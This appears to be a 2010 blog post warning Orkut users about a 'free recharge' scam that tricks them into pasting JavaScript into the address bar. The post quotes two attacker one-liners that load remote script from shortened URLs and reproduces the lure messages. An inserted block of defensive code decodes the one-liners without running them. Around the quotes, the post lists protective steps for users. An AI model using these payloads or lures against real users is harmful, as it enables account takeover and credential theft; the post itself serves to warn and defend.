Friday, July 30, 2010

Don't do any Recharge instructed on orkut

Scammers are tricking Orkut users into pasting malicious JavaScript code in their browser's address bar, with the promise of receiving a free recharge code for their mobile phones. Users who fall for the scam end up with their Google login credentials stolen.

It all starts with users receiving a link on Orkut that takes them to a website displaying a big banner that reads: "Recharge your mobile here!" According to information presented on this page, the user will receive a free recharge code in their Orkut scrapbook if they copy and paste some JavaScript code into the address bar.

Doing so will force the browser to access a Snurl.com shortened URL. "That triggers a big page of javascript code located at orkutaddict(dot)net/freerecharge/dpd(dot)js. At this point, the path branches off depending on whether you’re logged into Orkut or not,"

Attackers use scripts of this type:

javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//shlnk%22+%22.%22+%22com%22+%22/%22+%222d6%22;void(0)

In some of these scripts, removing "%22+%22" from the script gives the website name.
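The decoding described above, as an added example (not code from the original post): a static decoder that percent-decodes the pasted `javascript:` line, folds the split string literals back together and reports which remote script it would load, without ever running it. The function names are hypothetical; the two samples are the snippets quoted on this page.

```javascript
// Static analysis only: the pasted text is decoded and inspected, never evaluated.

// Merge adjacent literals ("ht"+"tp:" -> "http:") until nothing changes.
// Heuristic: handles plain quoted literals without escapes, as in the page's samples.
function foldStringConcats(code) {
  const pair = /(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3/;
  let prev;
  do {
    prev = code;
    code = code.replace(pair, (_m, q, a, _q2, b) => q + a + b + q);
  } while (code !== prev);
  return code;
}

function analyzeAddressBarSnippet(pasted) {
  const scheme = /^\s*javascript:/i.exec(pasted);
  if (!scheme) return { isJavascriptUri: false, scriptUrls: [], defanged: [] };
  let body = pasted.slice(scheme[0].length);
  try {
    body = decodeURIComponent(body); // %22 becomes "
  } catch (e) {
    // Malformed escape somewhere: decode only the well-formed %XX sequences.
    body = body.replace(/%([0-9a-f]{2})/gi, (_s, h) => String.fromCharCode(parseInt(h, 16)));
  }
  const folded = foldStringConcats(body);
  const scriptUrls = [...folded.matchAll(/\.src\s*=\s*(["'])(.*?)\1/g)].map(m => m[2]);
  return {
    isJavascriptUri: true,
    injectsScriptElement: /createElement\(\s*["']script["']\s*\)/i.test(folded),
    scriptUrls,
    // Defanged form for safe sharing in reports.
    defanged: scriptUrls.map(u => u.replace(/^http/i, "hxxp").replace(/\./g, "[.]")),
  };
}

// The two snippets quoted on this page.
const SAMPLES = [
  "javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//shlnk%22+%22.%22+%22com%22+%22/%22+%222d6%22;void(0)",
  "javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)",
];

for (const s of SAMPLES) console.log(analyzeAddressBarSnippet(s));
```

Both samples follow one pattern: create a script element, append it to the page, and point its src at a shortened URL, so whatever that URL serves runs inside the logged-in Orkut session.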

You are asked to paste such a script into the URL bar, after which your account may be hacked.

This leads to flooding of one's account; within a minute your account is temporarily disabled from performing various actions, such as sending scraps or messages to anyone. It may also lead to the deletion of one's account.



I have found some of the links (like: http://jghjghjjg.blogspot.com/) and users who do that. If you got it from them, he/she may also be a victim, because the script attacks your account, profile, scrapbook, friend list, "about me" section, etc. I have had some of the links banned, so if you try to open them your browser will not allow it; it will show:

"Reported Web Forgery!" on Mozilla Firefox

"Warning! Suspected Phishing site!!" on Google Chrome.
This depends upon your web browser.
I don't know what it shows on Internet Explorer. Find out; if it shows nothing related to a warning, that means it will show you a fake Orkut login page, so DON'T log in from it.



Attack method:
By scrap, such as:

"
Oww YOu knw Abt new FREE RECHARGE TRICK

Just Go to thiz SITE its So Dashing Yaar

IT WORKS!!! FREE RECHARGE TRICK .

Just Go to thiz Site And Follow The Below Steps yaar:

Acesse: www.shlnk.com/2ll

Copy n Paste link where www , orkut, com / Main *#Home is written i.e orkut home page

.

Try yaar its So awsum N I got recharge N accept my testinomial Also


(Check My Profile For More Recharge Cards)No Of PEOPLE WHO WON:15830032

"
Or

[[..::FOLLOW STEPS 4 FREE!! CELLPHONE RECHARGE::..

1)- Copy the Below Code in RED and Paste in URL Bar Where u write _(www.orkut.com_) and Press Enter

Code:

javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)

2)- Enter You Mobile Number and get Free Recharge..

Also Pass this to your Friends To GET MORE RECHARGE]]

----------------------------------------------------------------------------------------------------------------

What can we, the users, do to stop this?

→ Report the URLs at http://www.google.com/safebrowsing/report_phish/
→ Stop running scripts (JavaScript) in Orkut.
→ Tell friends about these scams and how to stay safe.
→ Delete the auto-generated scam threads in the communities.


What happens when the script runs?


→ It edits your about me and status.
→ It sends scraps to your friends asking them to run the script.
→ It posts threads in the communities you have joined.
→ It comments on photos of your friends.
→ It sends testimonials, etc.

I have already run the script; now what can I do?
→ Clear cookies and cache.
→ Change your account settings, i.e. password and security question.
→ Edit your about me, status, etc. that were changed by the script.
→ Never run any type of script again.

Always remember these points :

1. Don't ever log in to any site other than www.orkut.com

2. Don't ever run any JavaScript while logged into your Orkut account.

3. Never use any flooder in your account.

4. Don't ever share your password with anyone else, and keep changing your password regularly.

5. Don't ever click a suspicious link while logged into your Orkut a/c. If you are curious, you can copy the link and check it in another browser after clearing that browser's cookies and cache.

6. Don't ever install any suspicious script in Greasemonkey, and ALWAYS DISABLE GM before logging in to Orkut.

7. Do your mobile verification also, so that you can get back your a/c if the hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings

Also visit my post "GOOGLE PASSWORD RECOVERY(Coming Soon)"

8. Install a good, updated antivirus and anti-keylogger, and keep your system free from keyloggers and backdoor trojans.

9. Use a virtual keyboard to enter your password.

10. Also look carefully at the link given in anyone's profile or community, even if it looks like an Orkut link such as http://www.orkut.co.in/Main#Community?cmm=xxxxxx; check carefully that it says orkut and not okrut.


I will post the script that is used to do these if you want.

visit:

http://learninformationsecurity.t35.com/orkut_script


You are welcome for further suggestions/queries.

YASH.